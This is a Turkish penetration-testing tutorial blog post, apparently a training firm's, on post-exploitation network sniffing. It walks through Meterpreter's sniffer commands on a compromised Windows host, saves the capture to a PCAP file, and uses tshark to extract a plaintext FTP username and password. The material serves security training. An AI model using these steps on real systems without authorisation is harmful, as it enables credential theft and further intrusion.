Sızma Testlerinde İlerleme ( Post Exploitation -Network Sniffing)

Uzak bir sistem ele geçirildiğinde, hedef sistemde ilerlemek için elde edilecek kritik verilerden biride network trafiğidir. Ele geçirilen sistemin üzerinden ftp, http, smtp, pop3 vb. okunabilir veri trafiği akıyor ve şifreler, hassas bilgiler içeriyor olabilir.

Meterpreter ajanının sniffing özelliği ile, uzak sistemin ağ kartını dinleyerek trafiği kaydedebilirsiniz.

Alternatif olarak, kurulum gerektirmeyen rawcap yazılımıda kullanılabilir.
Rawcap kullanımı ile ilgili aşağıdaki blog girdisine bakabilirsiniz;
http://blog.bga.com.tr/2011/04/rawcap-windows-komut-satr-sniffer-arac.html

Meterpreter, hedef sisteme bulaştırıldıkdan sonra;

Meterpreter sniffer modülünün aktif edilmesi.

meterpreter > use sniffer

Sniffer Komutları

================

Command Description
——- ———–
sniffer_dump Retrieve captured packet data to PCAP file
sniffer_interfaces Enumerate all sniffable network interfaces
sniffer_start Start packet capture on a specific interface
sniffer_stats View statistics of an active capture
sniffer_stop Stop packet capture on a specific interface


Komut açıklamaları

sniffer_dump: Yakalanan trafiği dosya olarak kaydeder.
sniffer_interfaces: Ağ arabirimlerinin listesini verir.
sniffer_start: Belirtilen ağ arabirimi için paket yakalamaya başlar
sniffer_stats: Aktif sniffing için istatistlik sunar
sniffer_stop: Belirtilen ağ arabirimi için dinlemeyi sonlandırır.

Örnek uygulama;

Hedef sistemdeki ağ arabirimlerinin listesini ver,

meterpreter > sniffer_interfaces

1 – ‘Intel(R) PRO/1000 MT Network Connection’ ( type:0 mtu:1514 usable:true dhcp:false wifi:false )

1. numaralı ağ arabirimini dinle, 20000 paket yakala

meterpreter > sniffer_start 1 20000
[*] Capture started on interface 1 (20000 packet buffer)

Sniffing durumunu gözlemlemek için;

meterpreter > sniffer_stats 1

[*] Capture statistics for interface 1
packets: 5605
bytes: 569713

Yakalanan trafiği diske kaydet

meterpreter > sniffer_dump 1 /tmp/win2.cap
[*] Flushing packet capture buffer for interface 1…
[*] Flushed 6044 packets (741732 bytes)
[*] Downloaded 070% (524288/741732)…
[*] Downloaded 100% (741732/741732)…
[*] Download completed, converting to PCAP…
[*] PCAP file written to /tmp/win2.cap

Sniffing işlemini durdur

meterpreter > sniffer_stop 1
[*] Capture stopped on interface 1

Trafiği tshark ile analiz ettiğimizde, ftp ve http parolalarını yakalayabilirsiniz;

# tshark -r /tmp/win2.cap -R ftp
Running as user “root” and group “root”. This could be dangerous.
1182 15.000000 89.19.25.155 -> 1.1.1.101 FTP 96 Response: 220-FileZilla Server version 0.9.24 beta
1183 15.000000 89.19.25.155 -> 1.1.1.101 FTP 99 Response: 220-written by Tim Kosse (Tim.Kosse@gmx.de)
1184 15.000000 89.19.25.155 -> 1.1.1.101 FTP 115 Response: 220 Please visit http://sourceforge.net/projects/filezilla/
1187 15.000000 1.1.1.101 -> 89.19.25.155 FTP 69 Request: USER ozanucar
1188 15.000000 89.19.25.155 -> 1.1.1.101 FTP 90 Response: 331 Password required for ozanucar
1189 15.000000 1.1.1.101 -> 89.19.25.155 FTP 78 Request: PASS benimgizliparolam

Yazar:
Ozan UÇAR
ozan.ucar@bga.com.tr

Bu yazıda yer alan araç ve yöntemlerin daha fazlasına “Metasploit Exploitation Framework Pentest” eğitime katılarak öğrenebilirsiniz.

Eğitimle ilgili detay bilgi için lütfen egitim@bga.com.tr adresine e-posta gönderiniz.